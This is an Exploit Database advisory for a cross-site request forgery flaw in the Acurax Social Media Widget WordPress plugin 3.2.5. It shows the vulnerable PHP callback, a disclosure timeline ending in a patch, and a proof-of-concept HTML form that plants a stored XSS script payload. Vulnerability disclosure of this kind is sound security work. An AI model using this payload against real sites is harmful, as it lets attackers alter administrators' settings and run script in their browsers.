WordPress Plugin Social Media Widget by Acurax 3.2.5 – Cross-Site Request Forgery

• Exploit Database
• 110 阅读

• 作者： Panagiotis Vagenas
  日期： 2018-01-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43484/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

  * Exploit Title: Social Media Widget by Acurax [CSRF] * Discovery Date: 2017-12-12 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: http://www.acurax.com/ * Software Link: https://wordpress.org/plugins/acurax-social-media-widget * Version: 3.2.5 * Tested on: WordPress 4.9.1 * Category: WebApps, WordPress     Description -----------   Plugin implements AJAX action <code>acx_asmw_saveorder</code> which calls back the function <code>acx_asmw_saveorder_callback</code>. The later does not implement any anti-CSRF controls thus allowing a malicious actor to perform an attack that could update plugin specific option <code>social_widget_icon_array_order</code>.   Vulnerable param is <code>$_POST[&apos;recordsArray&apos;]</code> and it is saved as an option with the name <code>social_widget_icon_array_order</code>.   Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will be served when a user with the right privileges visits plugin&apos;s settings page (<code>wp-admin/admin.php?page=Acurax-Social-Widget-Settings</code>).   Vulnerable code is located in file acurax-social-media-widget/function.php</code> line 993: </code><code> function acx_asmw_saveorder_callback() { global $wpdb; $social_widget_icon_array_order = $_POST[&apos;recordsArray&apos;]; if ( current_user_can( &apos;manage_options&apos; ) ) { $social_widget_icon_array_order = serialize( $social_widget_icon_array_order ); update_option( &apos;social_widget_icon_array_order&apos;, $social_widget_icon_array_order ); echo "<div id=&apos;acurax_notice&apos; align=&apos;center&apos; style=&apos;width: 420px; font-family: arial; font-weight: normal; font-size: 22px;&apos;>"; echo "Social Media Icon&apos;s Order Saved"; echo "</div><br>"; } die(); // this is required to return a proper result }   add_action( &apos;wp_ajax_acx_asmw_saveorder&apos;, &apos;acx_asmw_saveorder_callback&apos; );   </code><code> PoC ---   In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent XSS attack. The payload is available in plugin&apos;s settings. </code><code> <pre class="lang:html decode:true "><form method="post" action="http://vuln.test/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="acx_asmw_saveorder"> <input type="text" name="recordsArray[]" value="1&apos;><script>alert(1);</script>"> <button type="submit" value="Submit">Submit</button> </form>   </code><code> Timeline --------   1. **2017-12-12**: Discovered 2. **2017-12-12**: Tried to contact plugin&apos;s vendor through the contact form on their website 3. **2017-12-12**: Vendor replied 4. **2017-12-12**: Vendor Received Details 5. **2018-01-02**: Patch released